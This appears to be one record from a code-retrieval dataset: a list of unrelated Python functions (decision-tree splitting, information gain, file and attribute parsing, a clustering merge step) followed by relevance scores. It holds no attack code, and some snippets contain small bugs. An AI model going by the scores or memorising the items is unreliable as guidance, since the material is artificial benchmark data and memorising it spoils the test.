"def get_pair_to_merge(self) -> tuple:\n index = np.argmin(self.distance_matrix)\n min_dist_index = np.unravel_index(index, self.distance_matrix.shape)\n\n merge_confidence = self.get_merge_confidence(min_dist_index)\n if merge_confidence < self.threshold and self.intervention_counter < self.max_user_intervention:\n pool = self.create_pool(min_dist_index)\n if self.is_validation:\n pool_index = self.select_merge(pool)\n else:\n # aqui vai uma função de exibir para o usuário quais as opcoes de merge\n pass\n min_dist_index = pool[pool_index]\n\n self.intervention_counter += 1\n\n return min(min_dist_index), max(min_dist_index)",
"def get_opt_split(self, command):\n if \"split\" in self.command_dict[\"commands\"][command].keys():\n return self.command_dict[\"commands\"][command][\"split\"]\n else:\n return CommandDict.DEFAULT_OPT_SPLIT",
"def split_alg(self):\n return self._split_alg",
"def separatePlot(self,schematicInfo):\n compInfo = []\n plotInfo = []\n for eachline in schematicInfo:\n words = eachline.split()\n if words[0] == 'run':\n continue\n elif words[0] == 'plot' or words[0] == 'print':\n plotInfo.append(eachline)\n else:\n compInfo.append(eachline)\n return compInfo, plotInfo",
"def extract_cds_args(self, line):\n result = {'indices': [int(line[3]), int(line[4])], \\\n 'strand': line[6], 'phase': int(line[7])}\n if isinstance(line[7], float):\n result['score'] = line[7]\n attribs = self.parse_attributes(line[8])\n\n if not attribs:\n return None\n\n if 'name' in attribs:\n del attribs['name']\n \n result.update(attribs)\n return result",
"def catalog_components(self, catalog_name, split_ver):\n return sorted(self._split_comp_info_dicts[\"%s_%s\" % (catalog_name, split_ver)].keys())",
"def get_dists_2():\n d1 = Distribution(['0', '1'], [1 / 2, 1 / 2])\n d2 = Distribution(['0', '1'], [1 / 3, 2 / 3])\n d3 = Distribution(['0', '1'], [2 / 5, 3 / 5])\n return d1, d2, d3",
"def calcInfoGainBySplitValue(self, data, structure, colName, splitVal):\n result = self.calcDataEntropy(data, structure) - self.calcEntropyBySplitValue(data, structure, colName, splitVal)\n result = 0 if result < 0 else result\n return round(result, 3)",
"def __info_gain_from_splits(self, potential_integer_splits, sorted_data):\n info_gains = []\n for split in map(int, potential_integer_splits):\n left_child = sorted_data[sorted_data[:, 0].astype(int) < split, :]\n right_child = sorted_data[sorted_data[:, 0].astype(int) >= split, :]\n info_gains.append(self.__calc_info_gain(sorted_data, left_child,\n right_child))\n return info_gains",
"def _findTangentSplitAuto(self, angles):\n # get angles from points\n splits = []\n\n # get average variables\n minAngle = min(angles) or 0.00001\n maxAngle = max(angles)\n average = (minAngle + maxAngle) * 0.5\n mean = sum(angles) / len(angles) * 0.5\n\n # get value at which to split\n threshold = (math.log(average) - math.log(mean)) / (math.log(maxAngle) - math.log(minAngle)) * average\n\n # if curve is relatively smooth don't split\n if mean * 10 > average:\n return []\n\n # split based on angles\n for i, angle in enumerate(angles):\n if angle > threshold:\n splits.append(i + 1)\n\n return splits",
"def info(self):\n\n print(\"pixellisation:\", self.pixel)\n print(\"number of components:\", self.ncomp)\n print(\"number of pixels:\", self.data.shape[:] if self.ncomp == 1 else self.data.shape[1:])\n print(\"nside:\", self.nside)\n print(\"geometry:\", self.geometry)\n print(\"coordinates:\", self.coordinate)",
"def split_trials(self) -> tuple[list[Trial], list[Trial]]:\n\n trials: list[Trial] = []\n for trial in self.registry:\n if trial.status != \"completed\":\n trial = self.strategy.infer(trial)\n\n if trial is not None:\n trials.append(trial)\n # NOTE: This assumes that all trials have an objective. Making assumption explicit.\n assert all(trial.objective is not None for trial in trials)\n sorted_trials = sorted(trials, key=lambda trial: trial.objective.value) # type: ignore\n\n split_index = int(numpy.ceil(self.gamma * len(sorted_trials)))\n\n below = sorted_trials[:split_index]\n above = sorted_trials[split_index:]\n\n return below, above",
"def keys(self):\n\t\treturn tuple(self.dist.keys())",
"def csv_attribute_unpacker(self, attribute_tuples: List[Tuple[str, str]], separator: str = \",\") \\\n -> Tuple[List[str], List[str]]:\n\n if not attribute_tuples:\n raise ValueError(\"The list of tuples containing the attributes is missing.\")\n\n join_attributes_set: set = set()\n selection_attributes_set: set = set()\n\n for j_attribute_string, s_attribute_string in attribute_tuples:\n for j_attribute in j_attribute_string.split(separator):\n join_attributes_set.add(j_attribute.strip())\n\n for operator in self.operators:\n s_attribute_string = s_attribute_string.replace(separator + operator + separator, operator)\n\n for s_attribute in s_attribute_string.split(separator):\n for operator in self.operators:\n if operator in s_attribute:\n s_attribute = s_attribute.split(operator)[0].strip()\n selection_attributes_set.add(s_attribute)\n break\n\n return list(join_attributes_set), list(selection_attributes_set)",
"def test_split(self,X,y,splits):\n n_data = len(y) #Number of data points\n splits=(X[splits]+X[splits+1])/2\n\n idx_greater = (X>splits[:,None]) #index for greater split\n idx_lower = (X<splits[:,None]) #index for lower split\n\n imp_greater =[self.impurity(y[idx]) for idx in idx_greater] #impurity for greater\n imp_lower = [self.impurity(y[idx]) for idx in idx_lower] #impurity lower\n\n impur = [sum(idx_great)/n_data*imp_great+sum(idx_low)/n_data*imp_low for idx_great,imp_great,idx_low,imp_low in zip(idx_greater,imp_greater,idx_lower,imp_lower)] #Weighted impurity\n return (impur,splits)",
"def _GetStatAttribute(self):\n stat_attribute = attribute.StatAttribute()\n stat_attribute.device_number = self._fshfs_file_entry.device_number\n stat_attribute.group_identifier = self._fshfs_file_entry.group_identifier\n stat_attribute.inode_number = self._fshfs_file_entry.identifier\n stat_attribute.mode = self._fshfs_file_entry.file_mode\n stat_attribute.number_of_links = self._fshfs_file_entry.number_of_links\n stat_attribute.owner_identifier = self._fshfs_file_entry.owner_identifier\n stat_attribute.size = self._fshfs_file_entry.size\n stat_attribute.type = self.entry_type\n\n return stat_attribute",
"def get_widths(self) -> tuple:\n words_width = 0\n spaces_width = 0\n for part in self.line_parts:\n words_width += part.width\n spaces_width += part.spaces_width\n return words_width, spaces_width",
"def __repr__(self):\n return (f'Heuristic: {self.heuristic}\\n'\\\n f'Ancestors: {self.ancestors}\\n'\\\n f'Result: {self.result}\\n'\\\n f'Attributes: {self.attributes}\\n'\\\n f'Split Attribute: {self.split_attr}\\n'\\\n f'Has children: {self.val0 != None}\\n')",
"def extract_mol_info(molecule_etree):\n smiles = extract_smiles(molecule_etree)\n alpha = extract_and_check_alpha(molecule_etree)\n beta = extract_and_check_beta(molecule_etree)\n return smiles, alpha, beta",
"def _get_switch_info(switch_info, host_id):\n for switch_ip in switch_info:\n if host_id in switch_info[switch_ip]:\n info = switch_info[switch_ip][host_id].split(\",\")\n return (switch_ip, info[0], info[1:])\n return (None, None, None)",
"def calculate_separation(self, from_boid: b.Boid, boids: List[b.Boid]) -> Tuple[float, float]:\n separation_x = 0\n separation_y = 0\n for boid in boids:\n distance_squared = (boid.x - from_boid.x) ** 2 + (boid.y - from_boid.y) ** 2\n if distance_squared < self.boid_avoid_distance:\n separation_x -= (boid.x - from_boid.x)\n separation_y -= (boid.y - from_boid.y)\n return separation_x, separation_y",
"def _get_path_infomation(self):\n long_identifier = self._device_path.split('/')[4]\n protocol, remainder = long_identifier.split('-', 1)\n identifier, _, device_type = remainder.rsplit('-', 2)\n return (protocol, identifier, device_type)",
"def _get_attribute(self):\n return self.split_text[1] if len(self.split_text) > 1 else \"\"",
"def split_model_attr_lookups(self):\n return self.model_attr.split(\"__\")",
"def file_info(self, f):\n ld8 = self.ld8_extract(f) # get luna_date\n sid = self.sesid(ld8) # make luna_visitnum\n age = self.age_lookup.get(sid)\n return (sid, age)",
"def splitkeys(self):\n return sorted(self._split_comp_info_dicts.keys())",
"def _get_std(self):\n return (0.229, 0.224, 0.225)",
"def info() -> Dict[str, Any]:",
"def get_perfect_information(self):\n raise NotImplementedError",
"def split_dev_data(input_data: List[Tuple[str, int]]) -> Tuple[List[Tuple[str, int]],\n List[Tuple[str, int]],\n List[Tuple[str, int]]]:\n training_data, test_data = split_data(input_data)\n\n # split test data in half to test on\n dev_data = set(random.sample(test_data, int(len(test_data) / 2)))\n test_data = set(test_data) - set(dev_data)\n\n return list(training_data), list(test_data), list(test_data)",
"def get_infos(self):\n infos = dict()\n infos[\"dataset\"] = self.dataset_name\n infos[\"task\"] = \"separate_noisy\"\n infos[\"licenses\"] = [librispeech_license, tac_license]\n return infos",
"def get_best_split(rows: list) -> (float, Question):\n best_info_gain = 0\n best_question = None\n current_uncertainty = get_gini_impurity(rows)\n\n # minus 1 because we're ignoring the last column which is the label.\n n_attributes = len(rows[0]) - 1\n\n for col in range(n_attributes):\n\n # get all unique values for an attribute/column\n unique_values = set([row[col] for row in rows])\n\n for value in unique_values:\n question = Question(col, value)\n\n # Split rows depending on the question\n true_rows, false_rows = partition(rows, question)\n\n # We don't want to partition such rows\n if len(true_rows) == 0 or len(false_rows) == 0:\n continue\n\n # Get info gain from this split\n info_gain = get_info_gain(false_rows, true_rows, current_uncertainty)\n\n if info_gain > best_info_gain:\n best_info_gain, best_question = info_gain, question\n\n return best_info_gain, best_question",
"def _get_parameters(self):\n return (self.SYMBOL, self.parameterArray())",
"def split_line(self, line):\n # type: (str) -> tuple\n\n parts = [s.strip() for s in line.split('#', 1)]\n package = parts[0]\n comment = parts[1] if len(parts) >= 2 else ''\n\n return package, comment",
"def get_pd_info():\n pd_info = browser.find_element_by_class_name(\"pd_info\")\n h1 = pd_info.find_element_by_class_name(\"biggest_hed\").get_property(\"innerHTML\")\n second_label = pd_info.find_element_by_class_name(\"second_label\").get_property(\n \"innerHTML\"\n )\n patrol_area = (\n pd_info.find_element_by_class_name(\"town_description\")\n .find_element_by_class_name(\"left\")\n .find_element_by_class_name(\"town_label\")\n .get_property(\"innerHTML\")\n )\n\n return (h1, second_label, patrol_area)",
"def split(self, mD, mS, depth=0):\n self.i, self.v, groups, score = self.getSplit()\n if groups == None:\n return\n self.lt, self.gt = groups[0], groups[1]\n self.lt.atr.append((self.i, \"%.1f\" % self.v))\n self.gt.atr.append((self.i, \"%.1f\" % self.v))\n self.gt.header, self.gt.mut = self.header, self.mut\n self.lt.header, self.lt.mut = self.header, self.mut\n print(\"..\" * depth, \"[atr \", self.i, \" < \", \"%.2f\" % self.v, \"] gini -\",score, sep='')\n if self.lt == None or self.gt == None:\n self.lt = self.gt = self.mostCommon()\n return\n if len(self.lt) <= mS or depth > mD:\n if len(self.lt) == 0: self.lt = self.mostCommon()\n else: self.lt = self.lt.mostCommon()\n else:\n self.lt.split(mD, mS, depth + 1)\n if len(self.gt) <= mS or depth > mD:\n if len(self.gt) == 0: self.gt = self.mostCommon()\n else: self.gt = self.gt.mostCommon()\n else:\n self.gt.split(mD, mS, depth + 1)"
] | [
"0.71336925",
"0.58916134",
"0.5822264",
"0.5647063",
"0.5593051",
"0.54801464",
"0.5435515",
"0.5412464",
"0.52879655",
"0.5234384",
"0.5225578",
"0.5210046",
"0.5198215",
"0.5153649",
"0.5132074",
"0.51248753",
"0.5116866",
"0.5087405",
"0.5079402",
"0.50550914",
"0.50493884",
"0.49971977",
"0.49914074",
"0.49908942",
"0.49848998",
"0.49822626",
"0.49608043",
"0.49428394",
"0.4921116",
"0.49209914",
"0.4902202",
"0.48665956",
"0.48484161",
"0.48474714",
"0.48453528",
"0.4843011",
"0.4839663",
"0.48395923",
"0.4838699",
"0.48345047",
"0.4829209",
"0.48212448",
"0.4814804",
"0.48071256",
"0.47964168",
"0.4796407",
"0.47958148",
"0.4785246",
"0.47817728",
"0.4774701",
"0.47669375",
"0.47641778",
"0.47633514",
"0.47617903",
"0.47617775",
"0.47507045",
"0.47484714",
"0.47462788",
"0.47419643",
"0.474159",
"0.47399464",
"0.4738406",
"0.47368598",
"0.47354266",
"0.47352648",
"0.47224835",
"0.47148874",
"0.470701",
"0.47044414",
"0.4703407",
"0.46992588",
"0.46967083",
"0.4695204",
"0.46937972",
"0.4690267",
"0.46816486",
"0.46766135",
"0.4676521",
"0.46732783",
"0.46724832",
"0.46663207",
"0.4662095",
"0.4653509",
"0.46520033",
"0.46491224",
"0.46476805",
"0.46472237",
"0.4647194",
"0.4644408",
"0.4641791",
"0.46404916",
"0.46370444",
"0.46325758",
"0.46319544",
"0.4631772",
"0.4627414",
"0.4626924",
"0.46249297",
"0.46235892",
"0.46227005",
"0.46219265"
] | 0.0 | -1 |
Generates a random distinction of this type than is valid for the schema config.schema and for the given graphs. This function for must take graphs as its first argument, and if its a conjugate distinction it must then take, as separate args, not a tuple, | def getRandomDistinction(config, graphs, *base_distinctions):
raise AbstractMethodException(Distinction) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def generate_regular_graph(variable_names, dist_func, num_neigh=10, **kwargs):\n shuffle(variable_names)\n num_vars = len(variable_names)\n num_neigh = min(num_neigh, num_vars-1)\n graphs = nx.random_graphs.random_regular_graph(num_neigh, num_vars)\n edges = np.array(graphs.edges())\n edges.sort(axis=-1)\n\n return graph_from_edges(variable_names, dist_func, edges)",
"def generate_full(variable_names, dist_func, **kwargs):\n return generate_random_graph(variable_names, dist_func, edge_prob=1.0)",
"def simulate_random_dag(d: int,\n degree: float,\n graph_type: str,\n w_range: tuple = (0.5, 2.0)) -> nx.DiGraph:\n if graph_type == 'erdos-renyi':\n prob = float(degree) / (d - 1)\n B = np.tril((np.random.rand(d, d) < prob).astype(float), k=-1)\n elif graph_type == 'barabasi-albert':\n m = int(round(degree / 2))\n B = np.zeros([d, d])\n bag = [0]\n for ii in range(1, d):\n dest = np.random.choice(bag, size=m)\n for jj in dest:\n B[ii, jj] = 1\n bag.append(ii)\n bag.extend(dest)\n elif graph_type == 'full': # ignore degree, only for experimental use\n B = np.tril(np.ones([d, d]), k=-1)\n else:\n raise ValueError('unknown graph type')\n # random permutation\n P = np.random.permutation(np.eye(d, d)) # permutes first axis only\n B_perm = P.T.dot(B).dot(P)\n U = 1*np.random.uniform(low=w_range[0], high=w_range[1], size=[d, d])\n U[np.random.rand(d, d) < 0.5] *= -1\n W = (B_perm != 0).astype(float) * U\n G = nx.DiGraph(W)\n return G",
"def test_unique_graph(self):\n g0_graph = tf.Graph()\n with g0_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n g1_graph = tf.Graph()\n with g1_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n\n g0 = gde.Graph(g0_graph.as_graph_def())\n g1 = gde.Graph(g1_graph.as_graph_def())\n a0, b0, a1, b1 = (g0[\"a\"], g0[\"b\"], g1[\"a\"], g1[\"b\"])\n\n print(\"g0['a'] returns {} (type {})\".format(g0['a'], type(g0['a'])))\n\n # Same graph, should be fine.\n self.assertIsNone(gde.util.check_graphs(a0, b0))\n # Two different graphs, should assert.\n with self.assertRaises(ValueError):\n gde.util.check_graphs(a0, b0, a1, b1)\n # a0 and b0 belongs to the same graph, should be fine.\n self.assertEqual(gde.util.get_unique_graph([a0, b0]), g0)\n # Different graph, should raise an error.\n with self.assertRaises(ValueError):\n gde.util.get_unique_graph([a0, b0, a1, b1])",
"def generate_random_graph(variable_names, dist_func, edge_prob, connected=False, max_parents=-1, num_latents=0, **kwargs):\n shuffle(variable_names) # To have a random order\n num_vars = len(variable_names)\n\n # Generate random adjacency matrix with specified edge probability\n adj_matrix = np.random.binomial(n=1, p=edge_prob, size=(num_vars, num_vars))\n\n # Make sure that adjacency matrix is half diagonal\n for v_idx in range(num_vars):\n adj_matrix[v_idx, :v_idx+1] = 0\n\n # Nodes that do not have any parents or children are connected\n for v_idx in range(num_vars):\n has_connection = (adj_matrix[v_idx, :].any() or adj_matrix[:, v_idx].any())\n if not has_connection:\n con_idx = np.random.randint(num_vars-1)\n if con_idx >= v_idx:\n con_idx += 1\n adj_matrix[v_idx, con_idx] = True\n else:\n adj_matrix[con_idx, v_idx] = True\n\n # Ensure that a node has less than N parents\n if max_parents > 0:\n for v_idx in range(adj_matrix.shape[0]):\n num_parents = adj_matrix[:, v_idx].sum()\n if num_parents > max_parents:\n indices = np.where(adj_matrix[:, v_idx] == 1)[0]\n indices = indices[np.random.permutation(indices.shape[0])[:num_parents-max_parents]]\n adj_matrix[indices, v_idx] = 0\n\n # Connect nodes to one connected graph\n if connected:\n visited_nodes, connected_nodes = [], [0]\n while len(visited_nodes) < num_vars:\n while len(connected_nodes) > 0:\n v_idx = connected_nodes.pop(0)\n children = np.where(adj_matrix[v_idx, :])[0].tolist()\n parents = np.where(adj_matrix[:, v_idx])[0].tolist()\n neighbours = children + parents\n for n in neighbours:\n if (n not in visited_nodes) and (n not in connected_nodes):\n connected_nodes.append(n)\n if v_idx not in visited_nodes:\n visited_nodes.append(v_idx)\n if len(visited_nodes) < num_vars:\n node1 = np.random.choice(np.array(visited_nodes))\n node2 = np.random.choice(np.array([i for i in range(num_vars) if i not in visited_nodes]))\n adj_matrix[min(node1, node2), max(node1, node2)] = True\n connected_nodes.append(node1)\n\n # Add latent confounders \n if num_latents > 0:\n # Latent confounders are identified by their variable name \"X_{l,...}\"\n variable_names = [r\"$X_{l,%i}$\" % (i+1) for i in range(num_latents)] + variable_names\n # Latent confounders are added in the graph structure. When exporting the graph, \n # we remove those variables so that we can apply our structure learning algorithm\n # without any changes.\n node_idxs = [v_idx+num_latents for v_idx in range(num_vars)\n if (adj_matrix[:, v_idx].sum() < max_parents or max_parents <= 0)]\n adj_matrix = np.concatenate([np.zeros((num_latents, num_vars)), adj_matrix], axis=0)\n adj_matrix = np.concatenate([np.zeros((num_vars+num_latents, num_latents)), adj_matrix], axis=1)\n # Randomly select the node pairs on which we want to have a latent confounder\n latent_children = []\n for l in range(num_latents):\n node_pair = None\n # We sample unique node pairs where there exists no direct edge between both nodes\n while node_pair is None or node_pair in latent_children or adj_matrix[node_pair[0], node_pair[1]]:\n node_pair = random.sample(node_idxs, k=2)\n node_pair = sorted(node_pair)\n latent_children.append(node_pair)\n adj_matrix[l, node_pair[0]] = 1\n adj_matrix[l, node_pair[1]] = 1\n latents = np.array([[i]+lc for i, lc in enumerate(latent_children)])\n else:\n latents = None\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix, latents=latents)",
"def test_CreateRandomGraph(\n node_x_dimensionality: int,\n node_y_dimensionality: int,\n graph_x_dimensionality: int,\n graph_y_dimensionality: int,\n):\n g = random_networkx_generator.CreateRandomGraph(\n node_x_dimensionality=node_x_dimensionality,\n node_y_dimensionality=node_y_dimensionality,\n graph_x_dimensionality=graph_x_dimensionality,\n graph_y_dimensionality=graph_y_dimensionality,\n )\n for _, data in g.nodes(data=True):\n assert len(data[\"x\"]) == node_x_dimensionality\n assert len(data[\"y\"]) == node_y_dimensionality\n assert len(g.graph[\"x\"]) == graph_x_dimensionality\n assert len(g.graph[\"y\"]) == graph_y_dimensionality",
"def _randomize(self):\n return self.graph",
"def generate_chain(variable_names, dist_func, **kwargs):\n shuffle(variable_names) # To have a random order\n num_vars = len(variable_names)\n\n adj_matrix = np.zeros((num_vars, num_vars), dtype=np.bool)\n for v_idx in range(num_vars-1):\n adj_matrix[v_idx, v_idx+1] = True\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix)",
"def test_random_node_disconnected_graphs(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g7, 'a', 'b'),\n (3, ['a', 'c', 'b']))",
"def generate_collider(variable_names, dist_func, **kwargs):\n shuffle(variable_names)\n num_vars = len(variable_names)\n\n adj_matrix = np.zeros((num_vars, num_vars), dtype=np.bool)\n adj_matrix[:-1, -1] = True\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix)",
"def generate_test_graph(sameDomain = False):\n num = 100\n\n urls = []\n emails = []\n nodes={}\n if sameDomain:\n domain = generate_domainname()\n else:\n domain = None\n for i in range(num):\n urls.append(generate_url(domain))\n emails.append(generate_email())\n \n used_urls = set()\n used_emails = set()\n for u in urls:\n l = random.choices(urls, k = floor(num/4))\n #l = [u for u in urls]\n e = random.choices(emails, k = floor(num/10))\n #e = [e for e in emails]\n used_urls.update(l)\n used_emails.update(e)\n nodes[u] = testNode(u, l, e)\n nodes[u].generate_page()\n \n return nodes, urls, emails",
"def generate_bidiag(variable_names, dist_func, **kwargs):\n shuffle(variable_names)\n num_vars = len(variable_names)\n\n adj_matrix = np.zeros((num_vars, num_vars), dtype=np.bool)\n for v_idx in range(num_vars-1):\n adj_matrix[v_idx, v_idx+1] = True\n if v_idx < num_vars - 2:\n adj_matrix[v_idx, v_idx+2] = True\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix)",
"def create_random_heterogeneous_crosslinking(graph, data_output, b, c, shape, dclm, k, f):#!!!\n d = densities(Vt=b[2][0]*b[2][1]*b[2][2], dclm=dclm, c=k, f=f)\n if shape == 'croix': z = croix(graph, c, b, f)\n elif shape == 'sphere': z = sphere(graph, c, b, f=f)\n else: print \"heu\", shape\n m = list(set(graph.nodes()).difference(set(z)))\n modified_graph = reticuler(graph, ['miniboucle'], d['dclh'], zone = z, visuel = False, blabla=True)\n twice_modified_graph = reticuler(modified_graph, ['alea'], d['dclm'], zone = m, visuel = False, sauvdata = data_output)",
"def test_generate_graph(self):\n expected_graph = {\n \"a\":[\"b\", \"c\"],\n \"b\":[\"c\"],\n \"c\":[\"b\"],\n }\n\n assert self.graph.generate_graph() == expected_graph",
"def random_two_graph(n):\n return nx.fast_gnp_random_graph(n, 2/(n*n), directed=True)",
"def generate_categorical_graph(num_vars,\n min_categs,\n max_categs,\n inputs_independent=False,\n use_nn=True,\n deterministic=False,\n graph_func=generate_random_graph,\n seed=-1,\n **kwargs):\n if seed >= 0:\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n\n if num_vars <= 26: # For less than 26 variables, we call the variables alphabetically, otherwise numerically\n variable_names = [n for i, n in zip(range(1, num_vars+1), string.ascii_uppercase)]\n else:\n variable_names = [r\"$X_{%s}$\" % i for i in range(1, num_vars+1)]\n var_num_categs = np.random.randint(min_categs, max_categs+1, size=(num_vars,))\n\n def dist_func(input_names, name):\n if min_categs != max_categs:\n input_num_categs = [var_num_categs[variable_names.index(v_name)] for v_name in input_names]\n num_categs = var_num_categs[variable_names.index(name)]\n else:\n input_num_categs, num_categs = [min_categs]*len(input_names), min_categs\n dist = get_random_categorical(input_names=input_names,\n input_num_categs=input_num_categs,\n num_categs=num_categs,\n inputs_independent=inputs_independent,\n use_nn=use_nn,\n deterministic=deterministic)\n return dist\n\n return graph_func(variable_names, dist_func, **kwargs)",
"def do_generations():\n # Extract the data from the initialised Instance\n gens = request.args.get('gens')\n gens = int(gens)\n current_gen = request.args.get('currentGen')\n current_gen = int(current_gen)\n client = request.args.get('client')\n graph_data = request.get_json()\n nodes = graph_data['nodes']\n alpha = graph_data['alpha']\n beta = graph_data['beta']\n decay = graph_data['decay']\n min_pheromone = graph_data['min_pheromone']\n q = graph_data['q']\n local_deposit = graph_data['local_deposit']\n distances = graph_data['distances']\n pheromones = graph_data['pheromones']\n ants = graph_data['ants']\n shortest_path = graph_data['shortest_path']\n min_distance = graph_data['min_distance']\n # Initialise an Instance copy\n i = Instance([], float(alpha), float(beta), float(decay), float(q))\n # Alter the Instance copy with the Instance data\n i.nodes = nodes\n i.min_pheromone = min_pheromone\n i.q = q\n i.local_deposit = local_deposit\n i.distances = distances\n i.pheromones = pheromones\n i.ants = ants\n i.shortest_path = shortest_path\n i.min_distance = min_distance\n # Perform the aco algorithm on the instance\n gen_reached, path, distance = i.aco(gens, current_gen, client)\n\n # Create a message for the console to output\n msg = \"Generation \" + str(gen_reached) + \" distance \" + str(distance) + \" path \" + str(path)\n return jsonify(nodes=i.nodes, alpha=i.alpha, beta=i.beta, decay=i.decay,\n min_pheromone=i.min_pheromone, q=i.q,\n local_deposit=i.local_deposit, distances=i.distances,\n pheromones=i.pheromones, ants=i.ants, shortest_path=i.shortest_path,\n min_distance=round(i.min_distance, 3), gen_reached = gen_reached, message=msg)",
"def sampled_clique(clusters,strategy):\n G = nx.Graph()\n sample = []\n #Sample 'size' nodes from a single cluster\n if strategy == \"rand\":\n size = len(clusters)\n while len(sample) < size:\n cluster = random.choice(clusters)\n if len(cluster) >= size:\n sample = random.sample(cluster,size)\n #Sample 1 choice from each cluster\n elif strategy == \"optim\":\n for _,cluster in clusters.items():\n if len(cluster) > 0:\n sample.append(random.choice(cluster))\n for n1 in sample:\n for n2 in sample:\n if n1 != n2:\n G.add_edge(n1,n2)\n return G",
"def generateUnaryRel(graph, dist=None):\n if dist is None:\n dist = lambda: random.randint(1, len(graph.nodes()))\n\n count = dist()\n return random.sample(graph.nodes(), count)",
"def generate_graph(self):\n temp_graph = [[] for i in xrange(Parameters.num_peers)]\n unconnected = set([i for i in xrange(Parameters.num_peers)])\n while len(unconnected) > 1:\n node1 = random.sample(unconnected, 1)[0]\n unconnected.remove(node1)\n node2 = random.sample(unconnected, 1)[0]\n temp_graph[node2].append(self.nodes[node1])\n temp_graph[node1].append(self.nodes[node2])\n unconnected = set([i for i in xrange(Parameters.num_peers)])\n i = 0\n for i in xrange(Parameters.num_peers*Parameters.num_neighbours/2-Parameters.num_peers):\n a = random.sample(unconnected, 1)[0]\n b = random.sample(unconnected, 1)[0]\n while b == a:\n b = random.sample(unconnected, 1)[0]\n temp_graph[a].append(self.nodes[b])\n temp_graph[b].append(self.nodes[a])\n graph = {}\n for i in xrange(len(self.nodes)):\n graph[\"P_\" + str(i)] = list(set(temp_graph[i]))\n return graph",
"def randomGraph(n,base=True,bSize=None,stronglyCon=False):\n A = (np.random.rand(n,n)>np.random.rand())*1.\n for j in range(n): A[j,j] = 0\n nodes = list(range(n))\n\n if stronglyCon:\n while not nx.is_strongly_connected(nx.DiGraph(A)):\n A = (np.random.rand(n,n)>np.random.rand())*1.\n for j in range(n): A[j,j] = 0\n nodes = list(range(n))\n\n if base:\n if bSize is None:\n bSize = np.random.randint(1,high=n)\n base = list(np.random.choice(nodes,replace=False,size=bSize))\n return A,base\n return A",
"def createRandomGraph():\n g = {}\n n = random.sample([0,1,2,3,4,5,6,7,8,9], 7)\n for i in n:\n g[i] = []\n edges = random.randint(10,20)\n count = 0\n while count < edges:\n a = random.choice(n)\n b = random.choice(n)\n if b not in g[a] and a != b:\n g[a].append(b)\n count += 1\n return g",
"def _make_random_graph(self, graph: mazegraph.MazeGraph):\n rmg.generate_random_maze(graph, self._settings)",
"def generate_Graph(edge, vertex):\n\tif edge > vertex *(vertex -1)/2 or vertex <0 or edge < 0:\n\t\tprint(\"Invalid number of edges\")\n\t\treturn None\n\n\tgraph = [[0 for x in range(vertex)] for y in range(vertex)] \n\t\n\t\n\twhile edge >0:\n\t\ta = random.randint(0,vertex-1)\n \n\t\tb = random.randint(0,vertex-1)\n\n\t\tif graph[a][b] == 1 or a ==b: \n\t\t\tcontinue\n\n\t\telse: \n\t\t\t\n\t\t\tedge = edge -1\n\t\t\tgraph[a][b] = 1\n\t\t\tgraph[b][a] = 1\n\treturn graph",
"def build_disconnected_test_graph():\n graph = build_triangle_graph()\n g2 = build_triangle_graph()\n g3 = build_triangle_graph()\n\n merge_graphs(graph, g2)\n merge_graphs(graph, g3)\n\n return graph",
"def _graph_fn_sample_deterministic(self, distribution):\n raise NotImplementedError",
"def random_one_graph(n):\n return nx.fast_gnp_random_graph(n, 1/(n*n), directed=True)",
"def generate_graph(size, number_of_clusters, minimal_size):\n base_list = list(range(size))\n result_list = []\n random.shuffle(base_list)\n for i in range(number_of_clusters - 1):\n size = random.randint(minimal_size, len(base_list) - (number_of_clusters - i - 1) * minimal_size)\n cluster = []\n for n in range(size):\n actual = random.choice(base_list)\n base_list.remove(actual)\n cluster.append(actual)\n result_list.append(strongly_connect(cluster))\n result_list.append(strongly_connect(base_list))\n\n while len(result_list) < 5:\n result_list.append([])\n\n print(sorted([len(i) for i in result_list], reverse=True)[:5])\n\n return weak_connect_graph(result_list)",
"def gen_graph(self):",
"def test_graph1():\n mol_graph = DGLGraph([(0, 1), (0, 2), (1, 2)])\n node_feats = torch.arange(mol_graph.number_of_nodes()).float().reshape(-1, 1)\n edge_feats = torch.arange(2 * mol_graph.number_of_edges()).float().reshape(-1, 2)\n\n complete_graph = get_complete_graph(mol_graph.number_of_nodes())\n atom_pair_feats = torch.arange(complete_graph.number_of_edges()).float().reshape(-1, 1)\n\n return mol_graph, node_feats, edge_feats, complete_graph, atom_pair_feats",
"def random_coaching_graph(num_classes, min_size, max_size, existing_rate):\n\n n = 0\n coaching_graph = graph.Graph(directed=True)\n for i in range(num_classes):\n n += 1\n class_size = random.randint(min_size, max_size)\n coach = infect.User(str(n))\n existing_users = coaching_graph.nodes()\n num_existing = len(existing_users)\n coaching_graph.add_node(coach)\n for j in range(class_size):\n if random.uniform(0,1) > existing_rate or num_existing < 100:\n n += 1\n user = infect.User(str(n))\n else:\n user = random.choice(existing_users)\n\n coaching_graph.add_edge(coach, user)\n\n\n return coaching_graph",
"def random_order(graph):\n return random.sample(graph, len(graph))",
"def generate_disjoint_omega_data(*args):\n if len(args) == 2:\n return generate_disjoint_omega(args[0], args[1])\n else:\n return generate_disjoint_biased_omega(args[0], args[1], args[2])",
"def generate_random_DC_single_force_uncoupled_tensor():\n # Generate random DC MT and single force:\n random_DC_MT_normallised = generate_random_DC_MT() # Generate a random DC sample\n random_single_force_normallised = generate_random_single_force_vector()\n # And split the amplitude of DC to single force randomly:\n random_amp_frac = random.random() # random number between 0. and 1.\n random_DC_MT_normallised = random_DC_MT_normallised*random_amp_frac\n random_single_force_normallised = random_single_force_normallised*(1.-random_amp_frac)\n # Finally combine to tensor of length 9:\n random_DC_single_force_uncoupled_tensor = np.vstack((random_DC_MT_normallised, random_single_force_normallised))\n return random_DC_single_force_uncoupled_tensor, random_amp_frac",
